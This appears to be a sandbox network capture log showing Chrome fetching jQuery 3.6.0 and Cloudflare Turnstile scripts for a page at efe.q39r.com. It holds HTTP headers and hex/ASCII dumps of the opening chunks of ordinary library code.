                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:57 UTC569INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 3827665
                                                                                  Date: Thu, 25 Apr 2024 16:22:57 GMT
                                                                                  X-Served-By: cache-lga21931-LGA, cache-pdk-kpdk1780096-PDK
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 2318, 0
                                                                                  X-Timer: S1714062178.625241,VS0,VE1
                                                                                  Vary: Accept-Encoding
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                  2024-04-25 16:22:57 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.1749710104.17.3.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:57 UTC644OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:58 UTC352INHTTP/1.1 302 Found
                                                                                  Date: Thu, 25 Apr 2024 16:22:58 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  location: /turnstile/v0/b/471dc2adc340/api.js?render=explicit
                                                                                  access-control-allow-origin: *
                                                                                  cache-control: max-age=300, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facc4aabe7bde-ATL
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.1749712104.17.3.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:58 UTC659OUTGET /turnstile/v0/b/471dc2adc340/api.js?render=explicit HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:58 UTC340INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:58 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 42415
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: max-age=31536000
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facc7dc0444fc-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:22:58 UTC1029INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 74 28 65 2c 72 2c 74 2c 6f 2c 75 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 73 5d 28 6d 29 2c 68 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 72 28 68 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 68 29 2e 74 68 65 6e 28 6f 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);funct
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6f 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 66 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                  Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,o)}return t}function wt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):fr(Object(r)).forEach(funct
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 75 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d 5b 53 79 6d 62 6f
                                                                                  Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Re(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},o,u,s,m;return m={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(m[Symbo
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 4f 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4f 65 3d 33 30 30 30 33 30 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 76 61 72 20 44 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 44 7c 7c 28 44 3d 7b 7d 29 29 3b 76
                                                                                  Data Ascii: me parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ot=300020;var Oe=300030;function N(e,r){return e.indexOf(r)!==-1}var D;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(D||(D={}));v
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 6e 67 22 26 26 70 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 76 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61
                                                                                  Data Ascii: ng"&&pr.test(e)}var vr=/^[a-z0-9_\-=]{0,255}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}function Ze(e){return N(["normal","compact","invisible"],e)}function et(e){return N(["auto","manual","never"],e)}function tt(e){return N(["a
                                                                                  2024-04-25 16:22:58 UTC1369INData Raw: 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 65 28 65 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 4e 65 28 29 3f 78 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 78 65 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 73 2c 6d 29 7b 76 61 72 20 62 3d 5b 6e 75 6c 6c 5d 3b 62 2e 70 75 73 68 2e 61 70 70 6c 79 28 62 2c 73 29 3b 76 61 72 20 68 3d 46 75 6e 63
                                                                                  Data Ascii: (typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function xe(e,r,t){return Ne()?xe=Reflect.construct:xe=function(u,s,m){var b=[null];b.push.apply(b,s);var h=Func
